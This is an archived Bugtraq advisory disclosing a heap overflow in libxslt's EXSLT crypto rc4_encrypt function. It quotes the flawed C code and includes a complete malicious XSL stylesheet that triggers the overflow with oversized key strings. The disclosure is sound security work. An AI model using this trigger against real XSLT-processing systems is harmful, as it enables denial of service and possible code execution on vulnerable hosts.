libxslt heap overflow

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: libxslt heap overflow
From: chris@xxxxxxxxxxxxxxxx
Date: Fri, 1 Aug 2008 02:03:11 +0100 (BST)
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Sender: Chris Evans <cevans@xxxxxxxxxxxxxxxxxxxxxxxx>

Hi,

A heap overflow exists in libxslt when processing a crypto-related
built-in function.

Full technical details:
http://scary.beasts.org/security/CESA-2008-003.html

The faulty code can be summarized:

static void
exsltCryptoRc4EncryptFunction (xmlXPathParserContextPtr ctxt, int nargs) {
...
    key = xmlXPathPopString (ctxt);
    key_len = xmlUTF8Strlen (str);

...
    padkey = xmlMallocAtomic (RC4_KEY_LENGTH);
    key_size = xmlUTF8Strsize (key, key_len);
    memcpy (padkey, key, key_size);
    memset (padkey + key_size, '\0', sizeof (padkey));
...


A statically-sized heap buffer is populated with an arbitrary-length
string from an incoming XSL function argument.

And the malicious XSL to trigger this:

<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform";

xmlns:str="http://exslt.org/strings";
xmlns:crypto="http://exslt.org/crypto";
xmlns:math="http://exslt.org/math";

extension-element-prefixes="str crypto math">
<xsl:template match="/">
<xsl:value-of
select="crypto:rc4_encrypt('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')"/>

blah
</xsl:template>
</xsl:stylesheet>


Blog post for this, and future issues (with RSS):
http://scarybeastsecurity.blogspot.com/2008/07/buffer-overflow-in-libxslt.html
http://scarybeastsecurity.blogspot.com/

Cheers
Chris

Prev by Date: CA ARCserve Backup for Laptops and Desktops Server LGServer Service Vulnerability
Next by Date: [SECURITY] [DSA 1625-1] New cupsys packages fix arbitrary code execution
Previous by thread: CA ARCserve Backup for Laptops and Desktops Server LGServer Service Vulnerability
Next by thread: [SECURITY] [DSA 1625-1] New cupsys packages fix arbitrary code execution
Index(es):
- Date
- Thread